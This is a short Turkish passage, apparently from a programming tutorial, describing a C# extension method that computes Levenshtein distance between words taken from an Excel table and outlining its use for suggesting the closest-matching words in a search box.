Uygulamamız içerisinde dikkat edeceğiniz üzere Excel tablosunda yer alan kelimelere ait bir test işlemi gerçekleştirilmektedir.FindLevenshteinDistance isimli metodumuz bir genişletme fonksiyonu olarak herhangibir string tipine uygulanabilecek şekilde tasarlanmıştır. Bununla birlikte söz konusu metod hem Levenshtein Distance matrisini, hemde yakınlık derecesini döndürmektedir. Uygulama içerisinde kelimeler arası testi kolaylaştırmak adına TestMethod isimli bir fonksiyon da ele alınmıştır. Programın çalışma zamanındaki çıktısı ise aşağıdaki gibi olacaktır.





Artık bundan sonrasında yapılması gereken, bir text kutucuğuna girilen metni, bir metin kümesi içerisinde söz konusu algoritmaya göre aramak ve yakınlık derecesi, bir başka deyişle operasyon işlem maliyeti en düşük olan kelime veya kelimeleri kullanıcıya sunmaya çalışmaktan ibarettir.